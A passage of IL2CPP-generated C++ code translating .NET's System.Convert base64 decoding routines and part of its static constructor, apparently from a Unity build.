OutOfMemoryException__ctor_m4ED0B5B3F91BAF66BDF69E09EF6DC74777FE8DEB(L_11, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_11, NULL, Convert_ToBase64_CalculateAndValidateOutputLength_m1FAAD592F5E302E59EAB90CB292DD02505C2A0E6_RuntimeMethod_var); } IL_0046: { int64_t L_12 = V_0; return (((int32_t)((int32_t)L_12))); } } // System.Byte[] System.Convert::FromBase64String(System.String) extern "C" IL2CPP_METHOD_ATTR ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* Convert_FromBase64String_m079F788D000703E8018DA39BE9C05F1CBF60B156 (String_t* ___s0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_FromBase64String_m079F788D000703E8018DA39BE9C05F1CBF60B156_MetadataUsageId); s_Il2CppMethodInitialized = true; } Il2CppChar* V_0 = NULL; String_t* V_1 = NULL; { String_t* L_0 = ___s0; if (L_0) { goto IL_000e; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_1 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_1, _stringLiteralA0F1490A20D0211C997B44BC357E1972DEAB8AE3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, Convert_FromBase64String_m079F788D000703E8018DA39BE9C05F1CBF60B156_RuntimeMethod_var); } IL_000e: { String_t* L_2 = ___s0; V_1 = L_2; String_t* L_3 = V_1; V_0 = (Il2CppChar*)(((uintptr_t)L_3)); Il2CppChar* L_4 = V_0; if (!L_4) { goto IL_001e; } } { Il2CppChar* L_5 = V_0; int32_t L_6 = RuntimeHelpers_get_OffsetToStringData_mF3B79A906181F1A2734590DA161E2AF183853F8B(/*hidden argument*/NULL); V_0 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_5, (int32_t)L_6)); } IL_001e: { Il2CppChar* L_7 = V_0; String_t* L_8 = ___s0; int32_t L_9 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_8, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_10 = Convert_FromBase64CharPtr_mBE2FEB558FE590EDCC320D6B864726889274B451((Il2CppChar*)(Il2CppChar*)L_7, L_9, /*hidden argument*/NULL); return L_10; } } // System.Byte[] System.Convert::FromBase64CharPtr(System.Char*,System.Int32) extern "C" IL2CPP_METHOD_ATTR ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* Convert_FromBase64CharPtr_mBE2FEB558FE590EDCC320D6B864726889274B451 (Il2CppChar* ___inputPtr0, int32_t ___inputLength1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_FromBase64CharPtr_mBE2FEB558FE590EDCC320D6B864726889274B451_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; uint8_t* V_2 = NULL; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* V_3 = NULL; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* G_B9_0 = NULL; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* G_B8_0 = NULL; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* G_B10_0 = NULL; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* G_B11_0 = NULL; { goto IL_0025; } IL_0002: { Il2CppChar* L_0 = ___inputPtr0; int32_t L_1 = ___inputLength1; int32_t L_2 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_0, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_1, (int32_t)1)))), (int32_t)2))))); V_1 = L_2; int32_t L_3 = V_1; if ((((int32_t)L_3) == ((int32_t)((int32_t)32)))) { goto IL_0020; } } { int32_t L_4 = V_1; if ((((int32_t)L_4) == ((int32_t)((int32_t)10)))) { goto IL_0020; } } { int32_t L_5 = V_1; if ((((int32_t)L_5) == ((int32_t)((int32_t)13)))) { goto IL_0020; } } { int32_t L_6 = V_1; if ((!(((uint32_t)L_6) == ((uint32_t)((int32_t)9))))) { goto IL_0029; } } IL_0020: { int32_t L_7 = ___inputLength1; ___inputLength1 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_7, (int32_t)1)); } IL_0025: { int32_t L_8 = ___inputLength1; if ((((int32_t)L_8) > ((int32_t)0))) { goto IL_0002; } } IL_0029: { Il2CppChar* L_9 = ___inputPtr0; int32_t L_10 = ___inputLength1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int32_t L_11 = Convert_FromBase64_ComputeResultLength_mEE0DB67C66BAFD2BD1738DF94FDDD571E182B622((Il2CppChar*)(Il2CppChar*)L_9, L_10, /*hidden argument*/NULL); V_0 = L_11; int32_t L_12 = V_0; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_13 = (ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821*)SZArrayNew(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821_il2cpp_TypeInfo_var, (uint32_t)L_12); ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_14 = L_13; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_15 = L_14; V_3 = L_15; G_B8_0 = L_14; if (!L_15) { G_B9_0 = L_14; goto IL_0041; } } { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_16 = V_3; G_B9_0 = G_B8_0; if ((((int32_t)((int32_t)(((RuntimeArray *)L_16)->max_length))))) { G_B10_0 = G_B8_0; goto IL_0046; } } IL_0041: { V_2 = (uint8_t*)(((uintptr_t)0)); G_B11_0 = G_B9_0; goto IL_004f; } IL_0046: { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_17 = V_3; V_2 = (uint8_t*)(((uintptr_t)((L_17)->GetAddressAtUnchecked(static_cast<il2cpp_array_size_t>(0))))); G_B11_0 = G_B10_0; } IL_004f: { Il2CppChar* L_18 = ___inputPtr0; int32_t L_19 = ___inputLength1; uint8_t* L_20 = V_2; int32_t L_21 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82((Il2CppChar*)(Il2CppChar*)L_18, L_19, (uint8_t*)(uint8_t*)L_20, L_21, /*hidden argument*/NULL); V_3 = (ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821*)NULL; return G_B11_0; } } // System.Int32 System.Convert::FromBase64_Decode(System.Char*,System.Int32,System.Byte*,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82 (Il2CppChar* ___startInputPtr0, int32_t ___inputLength1, uint8_t* ___startDestPtr2, int32_t ___destLength3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82_MetadataUsageId); s_Il2CppMethodInitialized = true; } Il2CppChar* V_0 = NULL; uint8_t* V_1 = NULL; Il2CppChar* V_2 = NULL; uint8_t* V_3 = NULL; uint32_t V_4 = 0; uint32_t V_5 = 0; int32_t V_6 = 0; { Il2CppChar* L_0 = ___startInputPtr0; V_0 = (Il2CppChar*)L_0; uint8_t* L_1 = ___startDestPtr2; V_1 = (uint8_t*)L_1; Il2CppChar* L_2 = V_0; int32_t L_3 = ___inputLength1; V_2 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_2, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_3)), (int32_t)2)))); uint8_t* L_4 = V_1; int32_t L_5 = ___destLength3; V_3 = (uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_4, (int32_t)L_5)); V_5 = ((int32_t)255); } IL_0016: { Il2CppChar* L_6 = V_0; Il2CppChar* L_7 = V_2; if ((!(((uintptr_t)L_6) < ((uintptr_t)L_7)))) { goto IL_01c8; } } { Il2CppChar* L_8 = V_0; int32_t L_9 = *((uint16_t*)L_8); V_4 = L_9; Il2CppChar* L_10 = V_0; V_0 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_10, (int32_t)2)); uint32_t L_11 = V_4; if ((!(((uint32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_11, (int32_t)((int32_t)65)))) <= ((uint32_t)((int32_t)25))))) { goto IL_0037; } } { uint32_t L_12 = V_4; V_4 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_12, (int32_t)((int32_t)65))); goto IL_00a7; } IL_0037: { uint32_t L_13 = V_4; if ((!(((uint32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_13, (int32_t)((int32_t)97)))) <= ((uint32_t)((int32_t)25))))) { goto IL_0049; } } { uint32_t L_14 = V_4; V_4 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_14, (int32_t)((int32_t)71))); goto IL_00a7; } IL_0049: { uint32_t L_15 = V_4; if ((!(((uint32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_15, (int32_t)((int32_t)48)))) <= ((uint32_t)((int32_t)9))))) { goto IL_005b; } } { uint32_t L_16 = V_4; V_4 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_16, (int32_t)((int32_t)-4))); goto IL_00a7; } IL_005b: { uint32_t L_17 = V_4; if ((!(((uint32_t)L_17) <= ((uint32_t)((int32_t)32))))) { goto IL_0077; } } { uint32_t L_18 = V_4; if ((!(((uint32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_18, (int32_t)((int32_t)9)))) > ((uint32_t)1)))) { goto IL_0016; } } { uint32_t L_19 = V_4; if ((((int32_t)L_19) == ((int32_t)((int32_t)13)))) { goto IL_0016; } } { uint32_t L_20 = V_4; if ((((int32_t)L_20) == ((int32_t)((int32_t)32)))) { goto IL_0016; } } { goto IL_0097; } IL_0077: { uint32_t L_21 = V_4; if ((((int32_t)L_21) == ((int32_t)((int32_t)43)))) { goto IL_008b; } } { uint32_t L_22 = V_4; if ((((int32_t)L_22) == ((int32_t)((int32_t)47)))) { goto IL_0091; } } { uint32_t L_23 = V_4; if ((((int32_t)L_23) == ((int32_t)((int32_t)61)))) { goto IL_00f1; } } { goto IL_0097; } IL_008b: { V_4 = ((int32_t)62); goto IL_00a7; } IL_0091: { V_4 = ((int32_t)63); goto IL_00a7; } IL_0097: { String_t* L_24 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral8F7ECF552BF6FB86CD369CCC08EDC822619395BA, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_25 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_25, L_24, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_25, NULL, Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82_RuntimeMethod_var); } IL_00a7: { uint32_t L_26 = V_5; uint32_t L_27 = V_4; V_5 = ((int32_t)((int32_t)((int32_t)((int32_t)L_26<<(int32_t)6))|(int32_t)L_27)); uint32_t L_28 = V_5; if (!((int32_t)((int32_t)L_28&(int32_t)((int32_t)-2147483648LL)))) { goto IL_0016; } } { uint8_t* L_29 = V_3; uint8_t* L_30 = V_1; if ((((int32_t)(((int32_t)((int32_t)(((int64_t)((int64_t)(intptr_t)((uint8_t*)((intptr_t)((uint8_t*)il2cpp_codegen_subtract((intptr_t)L_29, (intptr_t)L_30))/(int32_t)1))))))))) >= ((int32_t)3))) { goto IL_00c9; } } { return (-1); } IL_00c9: { uint8_t* L_31 = V_1; uint32_t L_32 = V_5; *((int8_t*)L_31) = (int8_t)(((int32_t)((uint8_t)((int32_t)((uint32_t)L_32>>((int32_t)16)))))); uint8_t* L_33 = V_1; uint32_t L_34 = V_5; *((int8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_33, (int32_t)1))) = (int8_t)(((int32_t)((uint8_t)((int32_t)((uint32_t)L_34>>8))))); uint8_t* L_35 = V_1; uint32_t L_36 = V_5; *((int8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_35, (int32_t)2))) = (int8_t)(((int32_t)((uint8_t)L_36))); uint8_t* L_37 = V_1; V_1 = (uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_37, (int32_t)3)); V_5 = ((int32_t)255); goto IL_0016; } IL_00f1: { Il2CppChar* L_38 = V_0; Il2CppChar* L_39 = V_2; if ((!(((uintptr_t)L_38) == ((uintptr_t)L_39)))) { goto IL_0164; } } { uint32_t L_40 = V_5; V_5 = ((int32_t)((int32_t)L_40<<(int32_t)6)); uint32_t L_41 = V_5; if (((int32_t)((int32_t)L_41&(int32_t)((int32_t)-2147483648LL)))) { goto IL_0115; } } { String_t* L_42 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral223DE1BFCB7230443EA0B00CBFE02D9443CF6BB1, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_43 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_43, L_42, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_43, NULL, Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82_RuntimeMethod_var); } IL_0115: { uint8_t* L_44 = V_3; uint8_t* L_45 = V_1; if ((((int32_t)(((int32_t)((int32_t)(((int64_t)((int64_t)(intptr_t)((uint8_t*)((intptr_t)((uint8_t*)il2cpp_codegen_subtract((intptr_t)L_44, (intptr_t)L_45))/(int32_t)1))))))))) >= ((int32_t)2))) { goto IL_0121; } } { return (-1); } IL_0121: { uint8_t* L_46 = V_1; uint8_t* L_47 = (uint8_t*)L_46; V_1 = (uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_47, (int32_t)1)); uint32_t L_48 = V_5; *((int8_t*)L_47) = (int8_t)(((int32_t)((uint8_t)((int32_t)((uint32_t)L_48>>((int32_t)16)))))); uint8_t* L_49 = V_1; uint8_t* L_50 = (uint8_t*)L_49; V_1 = (uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_50, (int32_t)1)); uint32_t L_51 = V_5; *((int8_t*)L_50) = (int8_t)(((int32_t)((uint8_t)((int32_t)((uint32_t)L_51>>8))))); V_5 = ((int32_t)255); goto IL_01c8; } IL_0144: { Il2CppChar* L_52 = V_0; int32_t L_53 = *((uint16_t*)L_52); V_6 = L_53; int32_t L_54 = V_6; if ((((int32_t)L_54) == ((int32_t)((int32_t)32)))) { goto IL_0160; } } { int32_t L_55 = V_6; if ((((int32_t)L_55) == ((int32_t)((int32_t)10)))) { goto IL_0160; } } { int32_t L_56 = V_6; if ((((int32_t)L_56) == ((int32_t)((int32_t)13)))) { goto IL_0160; } } { int32_t L_57 = V_6; if ((!(((uint32_t)L_57) == ((uint32_t)((int32_t)9))))) { goto IL_016a; } } IL_0160: { Il2CppChar* L_58 = V_0; V_0 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_58, (int32_t)2)); } IL_0164: { Il2CppChar* L_59 = V_0; Il2CppChar* L_60 = V_2; if ((!(((uintptr_t)L_59) >= ((uintptr_t)((Il2CppChar*)il2cpp_codegen_subtract((intptr_t)L_60, (int32_t)2)))))) { goto IL_0144; } } IL_016a: { Il2CppChar* L_61 = V_0; Il2CppChar* L_62 = V_2; if ((!(((uintptr_t)L_61) == ((uintptr_t)((Il2CppChar*)il2cpp_codegen_subtract((intptr_t)L_62, (int32_t)2)))))) { goto IL_01b8; } } { Il2CppChar* L_63 = V_0; int32_t L_64 = *((uint16_t*)L_63); if ((!(((uint32_t)L_64) == ((uint32_t)((int32_t)61))))) { goto IL_01b8; } } { uint32_t L_65 = V_5; V_5 = ((int32_t)((int32_t)L_65<<(int32_t)((int32_t)12))); uint32_t L_66 = V_5; if (((int32_t)((int32_t)L_66&(int32_t)((int32_t)-2147483648LL)))) { goto IL_0197; } } { String_t* L_67 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral223DE1BFCB7230443EA0B00CBFE02D9443CF6BB1, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_68 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_68, L_67, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_68, NULL, Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82_RuntimeMethod_var); } IL_0197: { uint8_t* L_69 = V_3; uint8_t* L_70 = V_1; if ((((int32_t)(((int32_t)((int32_t)(((int64_t)((int64_t)(intptr_t)((uint8_t*)((intptr_t)((uint8_t*)il2cpp_codegen_subtract((intptr_t)L_69, (intptr_t)L_70))/(int32_t)1))))))))) >= ((int32_t)1))) { goto IL_01a3; } } { return (-1); } IL_01a3: { uint8_t* L_71 = V_1; uint8_t* L_72 = (uint8_t*)L_71; V_1 = (uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_72, (int32_t)1)); uint32_t L_73 = V_5; *((int8_t*)L_72) = (int8_t)(((int32_t)((uint8_t)((int32_t)((uint32_t)L_73>>((int32_t)16)))))); V_5 = ((int32_t)255); goto IL_01c8; } IL_01b8: { String_t* L_74 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral8F7ECF552BF6FB86CD369CCC08EDC822619395BA, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_75 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_75, L_74, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_75, NULL, Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82_RuntimeMethod_var); } IL_01c8: { uint32_t L_76 = V_5; if ((((int32_t)L_76) == ((int32_t)((int32_t)255)))) { goto IL_01e1; } } { String_t* L_77 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral223DE1BFCB7230443EA0B00CBFE02D9443CF6BB1, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_78 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_78, L_77, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_78, NULL, Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82_RuntimeMethod_var); } IL_01e1: { uint8_t* L_79 = V_1; uint8_t* L_80 = ___startDestPtr2; return (((int32_t)((int32_t)(((int64_t)((int64_t)(intptr_t)((uint8_t*)((intptr_t)((uint8_t*)il2cpp_codegen_subtract((intptr_t)L_79, (intptr_t)L_80))/(int32_t)1)))))))); } } // System.Int32 System.Convert::FromBase64_ComputeResultLength(System.Char*,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_FromBase64_ComputeResultLength_mEE0DB67C66BAFD2BD1738DF94FDDD571E182B622 (Il2CppChar* ___inputPtr0, int32_t ___inputLength1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_FromBase64_ComputeResultLength_mEE0DB67C66BAFD2BD1738DF94FDDD571E182B622_MetadataUsageId); s_Il2CppMethodInitialized = true; } Il2CppChar* V_0 = NULL; int32_t V_1 = 0; int32_t V_2 = 0; uint32_t V_3 = 0; { Il2CppChar* L_0 = ___inputPtr0; int32_t L_1 = ___inputLength1; V_0 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_0, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_1)), (int32_t)2)))); int32_t L_2 = ___inputLength1; V_1 = L_2; V_2 = 0; goto IL_002d; } IL_000d: { Il2CppChar* L_3 = ___inputPtr0; int32_t L_4 = *((uint16_t*)L_3); V_3 = L_4; Il2CppChar* L_5 = ___inputPtr0; ___inputPtr0 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_5, (int32_t)2)); uint32_t L_6 = V_3; if ((!(((uint32_t)L_6) <= ((uint32_t)((int32_t)32))))) { goto IL_0020; } } { int32_t L_7 = V_1; V_1 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_7, (int32_t)1)); goto IL_002d; } IL_0020: { uint32_t L_8 = V_3; if ((!(((uint32_t)L_8) == ((uint32_t)((int32_t)61))))) { goto IL_002d; } } { int32_t L_9 = V_1; V_1 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_9, (int32_t)1)); int32_t L_10 = V_2; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_10, (int32_t)1)); } IL_002d: { Il2CppChar* L_11 = ___inputPtr0; Il2CppChar* L_12 = V_0; if ((!(((uintptr_t)L_11) >= ((uintptr_t)L_12)))) { goto IL_000d; } } { int32_t L_13 = V_2; if (!L_13) { goto IL_0054; } } { int32_t L_14 = V_2; if ((!(((uint32_t)L_14) == ((uint32_t)1)))) { goto IL_003c; } } { V_2 = 2; goto IL_0054; } IL_003c: { int32_t L_15 = V_2; if ((!(((uint32_t)L_15) == ((uint32_t)2)))) { goto IL_0044; } } { V_2 = 1; goto IL_0054; } IL_0044: { String_t* L_16 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral8F7ECF552BF6FB86CD369CCC08EDC822619395BA, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_17 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_17, L_16, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_17, NULL, Convert_FromBase64_ComputeResultLength_mEE0DB67C66BAFD2BD1738DF94FDDD571E182B622_RuntimeMethod_var); } IL_0054: { int32_t L_18 = V_1; int32_t L_19 = V_2; return ((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)((int32_t)((int32_t)L_18/(int32_t)4)), (int32_t)3)), (int32_t)L_19)); } } // System.Void System.Convert::.cctor() extern "C" IL2CPP_METHOD_ATTR void Convert__cctor_m04895F6ACC7D3D4BC92FC0CB5F24EBBEDF7FA9D1 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert__cctor_m04895F6ACC7D3D4BC92FC0CB5F24EBBEDF7FA9D1_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_0 = (RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE*)SZArrayNew(RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE_il2cpp_TypeInfo_var, (uint32_t)((int32_t)19)); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_1 = L_0; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_2 = { reinterpret_cast<intptr_t> (Empty_t31C7ECDF7D102AFFCE029D8AB11D8595F0316ED2_0_0_0_var) }; IL2CPP_RUNTIME_CLASS_INIT(Type_t_il2cpp_TypeInfo_var); Type_t * L_3 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_2, /*hidden argument*/NULL); ArrayElementTypeCheck (L_1, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_3, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_3, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_4 = L_1; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_5 = { reinterpret_cast<intptr_t> (RuntimeObject_0_0_0_var) }; Type_t * L_6 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_5, /*hidden argument*/NULL); ArrayElementTypeCheck (L_4, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_6, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_4)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_6, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_7 = L_4; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_8 = { reinterpret_cast<intptr_t> (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_0_0_0_var) }; Type_t * L_9 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_8, /*hidden argument*/NULL); ArrayElementTypeCheck (L_7, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_9, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_7)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(2), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_9, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_10 = L_7; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_11 = { reinterpret_cast<intptr_t> (Boolean_tB53F6830F670160873277339AA58F15CAED4399C_0_0_0_var) }; Type_t * L_12 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_11, /*hidden argument*/NULL); ArrayElementTypeCheck (L_10, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_12, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_10)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(3), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_12, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); 